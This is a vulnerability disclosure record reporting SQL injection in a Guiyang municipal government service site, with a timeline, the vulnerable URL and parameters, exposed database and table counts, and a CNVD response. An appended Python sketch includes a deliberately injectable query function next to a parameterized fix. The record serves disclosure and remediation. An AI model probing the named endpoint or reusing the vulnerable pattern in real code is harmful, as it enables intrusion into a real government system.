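2015-04-07: Details reported to the vendor; awaiting vendor handling
2015-04-10: Vendor confirmed; details disclosed to the vendor only
2015-04-20: Details disclosed to core white hats and experts in related fields
2015-04-30: Details disclosed to regular white hats
2015-05-10: Details disclosed to intern white hats
2015-05-25: Details disclosed to the public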
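SQL injection exists in the Guiyang Municipal People's Government Service Center site, exposing a large number of tables.
The vulnerability is located at one point in the service center site: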
http://www.gyasc.gov.cn:8088/application/zwgk/xzzhinanxiang.jsp?ZJJGDM=009400086&dname=%CA%D0%C1%B8%CA%B3%BE%D6 (GET)
Database: distribution [87 tables]
Database: web [369 tables]
As above.
Filter the input.
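As an added illustration of the fix (not code from the report or from the affected site), the sketch below contrasts string-built SQL with an allowlist check on `ZJJGDM` plus bound parameters. It uses Python and an in-memory SQLite table as a stand-in for the JSP/SQL Server stack; the `guide` table, its columns and the nine-digit code format are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# The dname bytes from the report's URL; the site percent-encodes GBK, not UTF-8.
DNAME_GBK = bytes.fromhex("cad0c1b8cab3bed6")
ORG_CODE = re.compile(r"[0-9]{9}")  # assumed format, inferred from 009400086

def make_db():
    """Constructed stand-in table; the real schema is not in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guide (org_code TEXT, dept TEXT, title TEXT)")
    db.executemany("INSERT INTO guide VALUES (?, ?, ?)", [
        ("009400086", DNAME_GBK.decode("gbk"), "guide A"),
        ("009400087", "other", "guide B"),
    ])
    return db

def parse_params(query_string):
    """Decode the query string as GBK; malformed bytes raise instead of passing through."""
    q = parse_qs(query_string, encoding="gbk", errors="strict")
    return q["ZJJGDM"][0], q["dname"][0]

def lookup_vulnerable(db, code):
    """Flawed pattern: request input concatenated into the SQL text."""
    sql = "SELECT title FROM guide WHERE org_code = '" + code + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, code, dept):
    """Allowlist the code, then bind both values so they are never parsed as SQL."""
    if not ORG_CODE.fullmatch(code):
        raise ValueError("ZJJGDM must be exactly nine digits")
    sql = "SELECT title FROM guide WHERE org_code = ? AND dept = ?"
    return db.execute(sql, (code, dept)).fetchall()
```

With the constructed data, a quote-bearing value widens the result set of `lookup_vulnerable`, while `lookup_safe` either rejects it or treats it as a literal string that matches nothing.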
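Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-04-10 17:45
CNVD confirmed and reproduced the situation described and has passed it to CNCERT for forwarding to the Guizhou sub-center, which will follow up and coordinate handling with the organization that manages the website.
None yet.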